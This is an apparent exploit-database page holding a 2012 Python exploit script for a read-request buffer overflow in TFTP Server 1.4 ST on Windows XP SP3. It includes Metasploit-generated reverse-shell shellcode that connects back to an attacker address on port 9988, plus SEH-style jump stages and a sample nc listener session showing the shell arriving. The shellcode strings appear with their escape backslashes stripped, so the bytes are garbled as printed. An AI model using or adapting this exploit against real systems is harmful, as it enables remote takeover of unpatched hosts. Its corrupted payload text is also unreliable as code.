Home / exploits TFTP Server 1.4 ST RRQ Overflow
Posted on 11 January 2012
#!/usr/bin/python #---------------------------------------------------------------------------# # Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) # # OS: Windows XP PRO SP3 # # Author: b33f # #---------------------------------------------------------------------------# # Smashing the stack for fun and practise... # # # # This tftp service have been pwned extensively: # # (1) Muts ==> WRQ Overflow # # http://www.exploit-db.com/exploits/5314/ # # (2) Molotov ==> WRQ Overflow # # http://www.exploit-db.com/exploits/10542/ # # (3) tixxDZ ==> ERROR Overflow # # http://www.exploit-db.com/exploits/5563/ # # # # Vulnerable software: # # http://www.exploit-db.com/application/5314/ # #---------------------------------------------------------------------------# # After some simple fuzzing with spike I discovered that sending a Read # # Request (RRQ) packet can also trigger a buffer overflow... # #---------------------------------------------------------------------------# # It might take up to 30 seconds for some reason but the shell does appear # # as expected.... # # # # root@bt:~# nc -lvp 9988 # # listening on [any] 9988 ... # # 192.168.111.128: inverse host lookup failed: Unknown server error # # connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:Program FilesTFTPServer> # #---------------------------------------------------------------------------# import socket import sys host = '192.168.111.128' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) #msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00' #x86/shikata_ga_nai succeeded with size 341 (iteration=1) shell = ( "xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1" "x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97" "xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f" "x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d" "xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92" "xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94" "xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50" "xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a" "xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed" "xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff" "x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec" "xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5" "xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0" "xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09" "x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51" "xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e" "x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c" "x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06" "x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1" "x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40" "xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f" "x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22" "xafx96x42xdfxddx87x26xdfx72xa7x62") #---------------------------------------------------------------------------# # (1) Stage1: 0x00409605 TFTPServer.exe - PPR # # => 3-byte overwrite using the mandatory protocol null-byte. # # (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump. # # (3) Stage3: jump back 1490-bytes to the beginning of our buffer. # # (4) Stage4: reverse shell port 9988 - size 341 # #---------------------------------------------------------------------------# stage4 = "x90"*50 + shell stage3 = "xE9x2ExFAxFFxFF" stage2 = "xEBxF9x90x90" stage1 = "x05x96x40" filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1 mode = "netascii" youlose = "x00x01" + filename + "x00" + mode + "x00" s.sendto(youlose, (host, port))
